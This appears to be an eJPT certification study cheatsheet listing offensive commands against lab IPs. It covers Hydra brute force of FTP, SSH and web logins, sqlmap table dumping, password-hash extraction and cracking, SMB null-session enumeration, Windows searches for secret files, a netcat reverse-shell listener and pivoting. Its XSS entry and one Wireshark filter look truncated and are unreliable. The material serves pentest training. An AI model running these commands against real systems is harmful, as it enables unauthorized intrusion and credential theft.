# eJPT-Cheatsheet
All the commands you need to pass the eJPT

Resources you may find useful:
- [eJPT - Review](https://hacknotes.github.io/certificaciones/eJPTReview/)
- [Passing the eJPT on the first try](https://hacknotes.github.io/certificaciones/eJPTAprove/)

# Ping sweep
## Nmap
```bash
# Host discovery only, no port scan
nmap -sn 10.10.10.0/24
```
## fping
```bash
# -a: list alive hosts, -g: generate targets from the CIDR range
fping -a -g 10.10.10.0/24 2>/dev/null
```
# Password cracking
## John
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```
## Online Tools
[CrackStation](https://crackstation.net/)
# Dump Hashes
## unshadow
```bash
# Merge passwd and shadow into a single file John can read
unshadow passwd shadow > hashes.txt
```
# Fuzzing
## Nmap
```bash
nmap --script=http-enum -p80 10.10.14.16 -oN webScan
```
## wfuzz
```bash
# --hc=404: hide responses with status 404
wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.14.15/FUZZ
wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.14.15/FUZZ.php
```
## dirb
```bash
dirb http://10.10.15.12
```
## gobuster
```bash
# -x: extensions to append to each word
gobuster dir -u 10.10.14.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
```
# SQLMap
```bash
sqlmap -u "http://10.10.14.12/file.php?id=1" -p id
sqlmap -u "http://10.10.14.12/file.php?id=1" -p id --dbs
sqlmap -u "http://10.10.14.12/file.php?id=1" -p id -D dbname --tables
sqlmap -u "http://10.10.14.12/file.php?id=1" -p id -D dbname -T table_name --dump
```
# Hydra
```bash
hydra -v -l admin -P passlist.txt ftp://192.168.0.1
hydra -v -L userlist.txt -P passlist.txt ftp://192.168.0.1
hydra -v -l root -P passwords.txt -t 1 -u 10.10.14.10 ssh
# http-post-form syntax: "<path>:<POST body>:<failure string>"
hydra -L userlist.txt -P passwordslist.txt 10.10.14.10 http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect"
```
# XSS
```html
H1
```
# SMB
## SMB enumeration
```bash
# -N: no password (null session)
smbclient -L 10.10.14.12 -N
smbmap -H 10.10.14.12 -u 'null'
# Quote the glob so the shell does not expand it
nmap --script='smb-vuln*' -p445 10.10.14.15 -oN smbScan
# -R: list the share recursively
smbmap -H 10.10.14.15 -R backups -u 'null'
```
## Accessing the **backups** share
```bash
smbclient //10.10.14.15/backups
```
# FTP
## FTP enumeration
```bash
nmap --script=ftp-anon -p21 10.10.14.12
ftp 10.10.14.12
cd ..
```
## FTP - Brute force
```bash
hydra -l admin -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.1
```
# Windows enumeration
```bat
dir /b/s "*.conf*"
dir /b/s "*.txt*"
dir /b/s "*secret*"
route print
netstat -r
fsutil fsinfo drives
wmic logicaldisk get Caption,Description,providername
```
# Reverse Shell
## nc
```bash
# Listen on port 443 for the incoming connection
nc -nlvp 443
```
## metasploit
```bash
msfconsole
```
# Post-exploitation
## Pivoting
### ip route
```bash
ip route add 10.10.16.0/24 via 10.10.16.1 dev tap0
```
### Metasploit
```bash
run autoroute -s 10.10.16.0/24
```
## Wireshark
Display filters:
```text
ip.addr==192.168.12
ip.src == 192.168.2.11
ip.dst == 192.168.2.15
```